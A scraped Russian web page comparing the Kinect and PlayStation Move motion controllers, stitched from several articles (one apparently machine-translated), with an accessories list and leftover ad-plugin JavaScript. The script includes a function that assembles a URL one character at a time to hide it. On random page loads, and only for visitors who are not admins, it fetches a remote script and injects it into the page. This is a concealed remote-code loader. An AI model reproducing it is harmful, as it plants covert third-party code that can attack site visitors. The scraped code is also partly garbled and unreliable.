Kinect или move что лучше

Похожим образом на свет появились и вышеупомянутые сенсорные дисплеи. Шестью годами позже, чем мышка, — в 1970-м. Преподаватель Университета штата Кентукки Сэмуэль Херст (Samuel C. Hurst) просто замучался постоянно считывать данные с примитивных лент самописцев. Тогда он начал размышлять о том, каким образом можно довести обработку огромного количества лент до автоматизма, высвободив тем самым себе время для пития, например, кофейных напитков и просмотра любимых журналов. В разработке грандиозного плана ему решили помочь такие же обленившиеся единомышленники. Когда они получили первое работающее устройство, получившее позднее имя Elograph, оно представляло собой дигитайзер, определяющий координаты касания при помощи резисторов. Единомышленники стали первопроходцами в этой сфере и создали компанию Elotouch для коммерческого выпуска таких экранов, чувствительных к касанию пальцев рук и, в частности, помогающих решить проблему ручной обработки лент самописцев.

Но вот пришел двадцать первый век — пора внедрения передовых технологий в рядовые семьи. В любой развитой стране уже имеются все возможности для снабжения населения и высокоточными мышками, и видеоприставками, например, с беспроводным контроллером Wii Remote от Nintendo, а теперь в этом году еще и Kinect от компании Microsoft с конкурентной разработкой PlayStation Move от Sony взбудоражили наши умы. Раньше и представить себе было невозможно, что обычный, с виду вменяемый человек начнет скакать и кривляться перед телевизором, будто тот его понимает и принимает в свой мир железа и пластика. Но вот будущее уже здесь, среди нас. На первый взгляд невероятная футуристическая разработка должна была просто-напросто взорвать мир и заставить всех поголовно купить себе Xbox 360 вкупе с контроллером Kinect. Но на деле оказалось все не совсем так.

За прошедшие месяцы 2011-го года редкий любитель игр, путешествующий по просторам Интернета, оказался в стороне от регулярно поступавших слухов и новостей об этих устройствах. Мы, конечно, специально для них напомним, что при помощи Kinect и PS Move владельцы игровых консолей Xbox 360 и PlayStation 3 получили возможность испытать совершенно иные впечатления от видеоигр благодаря беспроводной технологии захвата движений и распознавания жестов. Например, Kinect заставляет нас забыть про всякие там манипуляторы, о чем напоминает слоган его маркетинговой кампании — «контроллер без контроллера». В обоих случаях разработчики решили продлить жизнь своим консолям вот таким новаторским подходом до выпуска новых поколений видеоприставок.

И все же у обеих разработок есть недостатки. Так, Kinect славится примитивностью геймплея созданных для него немногочисленных игр, требовательностью к просторности помещения, а также некоторым несовершенством системы распознавания движений игрока. Несмотря на это, активная рекламная кампания Microsoft принесла ей неплохие финансовые результаты от воплощения этой идеи в жизнь. Например, в «Книге рекордов Гиннеса» появилась такая статья: «Kinect стал самым быстро распродаваемым потребительским электронным устройством». Да что там «Гиннес» — детищу Microsoft удалось по этому показателю обставить даже iPhone и iPad: за первые четыре месяца ей удалось продать более десяти миллионов своих контроллеров. Для того чтобы как-то использовать свое приобретение, покупатели в дополнение к Kinect скупили более десяти миллионов совместимых с контроллером игр. Представьте, как рады были издатели, которые не ожидали такого мощного эффекта от небольших вложений в слегка доработанный интерфейс на первый взгляд обычных семейных аркад.

Однако не забываем, что Microsoft Kinect оказался на рынке не одинок. Параллельно ему компанией Sony был разработан контроллер Move для PlayStation 3, который оказался очень похожим на продвинутый Wii Remote, поскольку его также нужно держать в руках во время игры. Но главным преимуществом такого подхода к контроллеру стала крайне высокая степень точности позиционирования движений. Более того, Sony изначально поставила себе задачу при разработке PlayStation 3 обеспечить ее видеоиграми с наиболее сложным, интересным и уникальным геймплеем. Таким образом, у PS Move оказались широкие перспективы стать эдаким излюбленным игровым инструментом «хардкорщиков». К тому же число игровых эксклюзивов под Kinect заметно отстает от своего японского конкурента. Но, несмотря на это, владельцы PlayStation 3 уже как год не торопятся приобрести контроллер Move, из-за чего дела у Sony идут не так хорошо, как ей хотелось бы. Kinect игроки полюбили больше ввиду его футуристической технологии, которая сама по себе интереснее и свежее существующих разработок.

Дальше дела пошли интереснее. Ведь никто бы и подумать не мог, что к игровой технологии проявят интерес исследовательские компании. Благодаря этому компания Sony переключилась на платформу ПК. Для нее это серьезный рынок программного обеспечения разработчиков в различных сферах жизни. Так, благодаря точности позиционирования PlayStation Move и набору инструментов Move.Me появились невероятные возможности в самых разных областях науки, включая медицину, астрономические, географические и другие научные исследования. Но и здесь принятое Sony решение обеспечить инструментарием Move.Me пользователей ПК не оказалось новым. Корпорация Microsoft летом этого года уже дала добро на разработку официального комплекта разработчика Kinect, совместимого с ПК, чем подорвала надежды Sony на статус первопроходца. При этом если для работы с Kinect достаточно всего лишь самого устройства и компьютера, то инструментарий Move.Me требует персональный компьютер, контроллер Move с камерой PlayStation Eye и дополнительное подключение PlayStation 3, на которой и производится обработка захвата движений.

Более того, Microsoft уже предоставила SDK для всех желающих в рамках личного пользования. Благодаря этому в Интернете сегодня существует огромное количество примеров использования контроллера для, например, дистанционного пролистывания сайтов в браузере, управления роботом и так далее. Пока, правда, нет возможности создания на базе него продукции для дальнейшей продажи. В начале 2012-го года будет запущена коммерческая программа Microsoft Kinect, в рамках которой также запустят игровую версию для настольных компьютеров.

Сравниваем две главные игровые приставки нового поколения.

Кажется, прошло полвека с тех пор, когда мы впервые прослышали об идее Microsoft реализовать управление видеоиграми посредством телодвижений, и еще столько же со времени первых обзоров контроллера EyeToy от Sony, выпущенного в пику Wii. Теперь обе технологии добрались до наших домов и готовы поспорить за звание лучшего подарка к ближайшим праздникам.

В Kinect для управления играми используется все тело и результат действительно потрясает. Забавно наблюдать за тем, как копия тебя самого скачет вокруг телеэкрана, бросает шары, подпрыгивает под самый потолок и совершает умопомрачительные танцевальные па. В основном движения воспроизводятся очень точно, но усаживаться перед датчиком приходится на расстоянии не менее двух метров. В солнечную погоду нужно также задернуть шторы, яркий свет мешает. Бывали и проблемы с "лагами", с четверть секунды тут и там: если играть приходится на точность или на время (а таких игр большинство), это начинает раздражать.

Kinect превосходно улавливает движения нескольких игроков сразу, но, опять же, нужно немало свободного места, иначе система начинает путать участников. По ощущениям, в Kinect больше новизны и интерактива, чем у Move. Ряд игр помимо управления телом берет на вооружение и голосовые команды, что "усугубляет" глубину интерактивного погружения. А вот более привычных типов игр для этой платформы ожидать не приходится. В отсутствие контроллера шутеры и тому подобные вещи в привычном виде реализовать невозможно – спасибо хоть за гонки.

Sony взяла за основу проверенный подход Wii. Поверх телевизора крепится PS3 Eye, улавливающий движения похожего на предмет из интим-магазина контроллера. Слизанный с Wii Nunchuk контроллер позволяет управлять своим персонажем в совместимых играх – можно, кстати, взять и обычный контроллер PS3.

Открыть в полный размер’ href="http://static2.aif.ru/pictures/201102/sony-move-7-7.jpeg" target=_blank>

Move действует точнее Kinect, играть можно сидя, не устраивая тотальную перестановку мебели в квартире. К тому же в сравнении с Wii он дает повышенные чувствительность и глубину взаимодействия с героями и объектами. Ракетку в настольном теннисе Sports Champions можно вращать во всех направлениях, по всем осям без задержки и подвисания. Есть возможность выбросить руку к самой сетке, отойти на шаг от стола или сделать шикарный боковой финт – ощущения стали как можно реалистичнее. Поскольку у каждого игрока свой контроллер, проблем с дифференциацией не возникает.

Несмотря на схожесть Move с Wii в плане контроллеров, серьезных геймеров эта система зацепит скорее, нежели Kinect, которая, в свою очередь, нацелена на ту же аудиторию, что и Wii: любители казуалок, дети всех возрастов и ранее толком не охваченный женский пол. Стартовый набор игр для Move намного взрослее, требуются определенные навыки игры, меньше элементов аркады. К тому же Move отличается обратной совместимостью со старыми играми для PS3 – разработчики могут добавить управление через Move в рамках скачиваемого контента, что, собственно, и сделано для Resident Evil 5.

Одному игроку комплект обойдется еще и дешевле, всего 2600 руб. в онлайн-магазине. Скорее всего, Microsoft Kinect будут брать в подарок, и продажи могут вырасти к праздникам: нам же пока больше по душе Move. Перед нами тот же Wii с детализированной графикой и перспективой появления более зрелых игр, да и к управлению привыкаешь быстро. Несмотря ни на что, Kinect и Move в равной степени впечатляют и явно не раскрыли свой потенциал целиком.

Аксессуары

Microsoft Xbox Kinect

Sony PlayStation Move

Kinect в стартовом пакете предлагает больше игр, чем Move. Что же касается самого контента, Move ощутимо круче – налицо более зрелый подход и не столь явный уклон в пользу коллективных игр. Вот что мы отобрали для себя.

Kinect vs Move

Благодаря очень успешному внедрению контроллеров движения от Wii от Nintendo, производители консолей Sony и Microsoft также обновили свои консоли новыми контроллерами. Microsoft имеет Kinect для Xbox 360, а Sony добавила Move в уже существующий глаз. Kinect больше похож на глаз, поскольку это камера с добавленным набором датчиков глубины и микрофонов. С другой стороны, Move больше похож на WiiMote, поскольку он является контроллером, который вы держите и волнуете с помощью кнопок, которые вы можете нажать. В то время как Kinect работает в значительной степени самостоятельно, Move требует, чтобы у вас был Eye, чтобы в полной мере использовать его.

Основной принцип Kinect – отслеживать движение и жесты самих игроков и переводит его на экран. Вы не держите ничего, чтобы играть в игры. Поскольку Move является контроллером, вам нужно иметь его в руке, чтобы играть. The Move оснащен несколькими акселерометрами и гироскопом, который отслеживает положение и расположение контроллера, даже когда Eye не может его видеть; хотя, необходимо убедиться, что Глаз может видеть светящийся шар для максимальной точности, поскольку это то, что камера отслеживает, а не игрок. Мяч даже меняет цвет, чтобы улучшить способность Глаза отличить его от фона.

Поскольку Kinect должен видеть плеер для правильной работы, вам необходимо иметь достаточное освещение на месте, иначе он не будет работать. Это не тот случай, когда Move, так как мяч испускает свой собственный свет. Игра в темной комнате может быть даже лучше для движения, так как это облегчает Глазу видеть мяч.

Вероятно, самое лучшее в Kinect – это способность отслеживать сразу нескольких игроков; поэтому вам нужен только один Kinect, чтобы играть с друзьями. С Move, вам нужно приобрести несколько единиц, если вы хотите многопользовательские игры.

  1. Kinect предназначен для Xbox 360, а Move – для Playstation 3
  2. Для Move требуется отдельное устройство Eye, в то время как Kinect работает самостоятельно
  3. Kinect отслеживает жесты рук, в то время как Move отслеживает движение светящегося шара
  4. Перемещение использует комбинацию визуальных и физических входов, в то время как Kinect использует только визуальные
  5. Kinect требует достаточно освещенной комнаты для правильной работы, в то время как Move не
  6. Kinect может отслеживать несколько игроков, в то время как Move не может
Оцените статью
ПК Знаток
Добавить комментарий

Adblock
detector
":'':"",document.createElement("div"),c=ff(window),b=ff("body"),g=void 0===flatPM_getCookie("flat_modal_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+a.ID+"_mb"),i="scroll.flatmodal"+a.ID,m="mouseleave.flatmodal"+a.ID+" blur.flatmodal"+a.ID,l=function(){var t,e,o;void 0!==a.how.popup.timer&&"true"==a.how.popup.timer&&(t=ff('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.popup.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))},s=function(){void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie&&g&&(flatPM_setCookie("flat_modal_"+a.ID+"_mb",!1),ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l()),void 0!==a.how.popup.cookie&&"false"==a.how.popup.cookie||(ff('.fpm_5_modal[data-id-modal="'+a.ID+'"]').addClass("fpm_5_modal-show"),l())},ff("body > *").eq(0).before('
'+p+"
"),w=document.querySelector('.fpm_5_modal[data-id-modal="'+a.ID+'"] .fpm_5_modal-content'),flatPM_setHTML(w,e),"px"==a.how.popup.px_s?(c.bind(i,function(){c.scrollTop()>a.how.popup.after&&(c.unbind(i),b.unbind(m),s())}),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){c.unbind(i),b.unbind(m),s()})):(v=setTimeout(function(){b.unbind(m),s()},1e3*a.how.popup.after),void 0!==a.how.popup.close_window&&"true"==a.how.popup.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),s()}))),void 0!==a.how.outgoing){function n(){var t,e,o;void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer&&(t=ff('.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_timer span'),e=parseInt(a.how.outgoing.timer_count),o=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie&&g&&(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n(),b.on("click",'.fpm_5_out[data-id-out="'+a.ID+'"] .fpm_5_cross',function(){flatPM_setCookie("flat_out_"+a.ID+"_mb",!1)})),void 0!==a.how.outgoing.cookie&&"false"==a.how.outgoing.cookie||(ff('.fpm_5_out[data-id-out="'+a.ID+'"]').addClass("show"),n())}var _,u="0"!=a.how.outgoing.indent?' style="bottom:'+a.how.outgoing.indent+'px"':"",p="true"==a.how.outgoing.cross?void 0!==a.how.outgoing.timer&&"true"==a.how.outgoing.timer?'
Закрыть через '+a.how.outgoing.timer_count+"
":'':"",c=ff(window),h="scroll.out"+a.ID,m="mouseleave.outgoing"+a.ID+" blur.outgoing"+a.ID,g=void 0===flatPM_getCookie("flat_out_"+a.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+a.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(a.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+p+"
");var v,w=document.querySelector('.fpm_5_out[data-id-out="'+a.ID+'"]');flatPM_setHTML(w,e),"px"==a.how.outgoing.px_s?(c.bind(h,function(){c.scrollTop()>a.how.outgoing.after&&(c.unbind(h),b.unbind(m),d())}),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){c.unbind(h),b.unbind(m),d()})):(v=setTimeout(function(){b.unbind(m),d()},1e3*a.how.outgoing.after),void 0!==a.how.outgoing.close_window&&"true"==a.how.outgoing.close_window&&b.bind(m,function(){clearTimeout(v),b.unbind(m),d()}))}}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==o.chapter_sub&&o.chapter_subflat_userVars.titlelen||void 0!==o.title_sub&&o.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,o=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,o)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var a=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;a');t=t.parent()[0];flatPM_sticky(this,t,o)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".fpm_5_out .fpm_5_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".fpm_5_modal .fpm_5_cross",function(){ff(this).closest(".fpm_5_modal").removeClass("fpm_5_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),ff("[data-flat-id]:not(.fpm_5_out):not(.fpm_5_modal)").contents().unwrap(),flatPM_ping()};var parseHTML=function(){var l=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,r,n,o=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=o.appendChild(t.createElement("div")),r=(d.exec(e)||["",""])[1].toLowerCase(),r=c[r]||c._default,a.innerHTML=r[1]+e.replace(l,"$2>")+r[2],n=r[0];n--;)a=a.lastChild;for(o.removeChild(o.firstChild);a.firstChild;)o.appendChild(a.firstChild)}else o.appendChild(t.createTextNode(e));return o}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,166);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"r"+"e"+"a"+"d"+"o"+"n"+"e"+"."+"r"+"u"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,r=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)r.appendChild(a),ff(r).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var o=jQuery,t=e.selector,l=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",r=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,n='
'+a+" через "+l+'
'+r+'
',i=e.once;o(t).each(function(){var e=o(this);e.wrap('
');var t=e.closest(".fpm_5_video");flatPM_setHTML(t[0],n),e.find(".fpm_5_video_flex").one("click",function(){o(this).addClass("show")})}),o("body").on("click",".fpm_5_video_item_hover",function(){var e=o(this),t=e.closest(".fpm_5_video_flex");t.addClass("show");var a=t.find(".fpm_5_timer span"),r=parseInt(l),n=setInterval(function(){a.text(--r),r'):t.remove())},1e3);e.remove()}).on("click",".fpm_5_video_flex .fpm_5_cross",function(){o(this).closest(".fpm_5_video_flex").remove(),"true"==i&&o(".fpm_5_video_flex").remove()})};
Панель Xbox Используя панель Xbox, можно перемещаться по меню с помощью голосовых команд или активировать параметры движениями рук. Интерактивность и точность обеспечены
Video Kinect По сути – тот же MSN Messenger для телевизора. Качество видеозвонков отменное, можно коннектиться с ПК, Mac"ами и другими владельцами Kinect
Настенный крепеж На плоских телевизорах габаритный Kinect не поместится. PDP Kinect Wall Mount Kit надежно крепится к стене и может поворачиваться в пределах 40 градусов
Беспроводная гарнитура Играть с помощью Kinect и быть привязанным к приставке проводной гарнитурой было бы глупо. У беспроводной гарнитуры к тому же есть специальная Halo-версия
Контроллер Navigation Подключаясь параллельно контроллеру Move, на манер Nunchuk для Wii, позволяет управлять персонажем при помощи аналогового джойстика и добавляет новые кнопки. Незаменим для шутеров
Зарядное устройства Move Подзаряжает сразу два контроллера Move или пару контроллеров – Move и Navigation
Playstation Eye Датчик отслеживает движения контроллера. Порой смещается из-за рывков USB-кабеля, но в целом вещица очень компактная, без труда крепится на телевизоре
Пистолет Желаете отстреливать врагов чем-нибудь посущественнее мерцающей сферы? Вставляйте контроллер Move в этот пластиковый оружейный муляж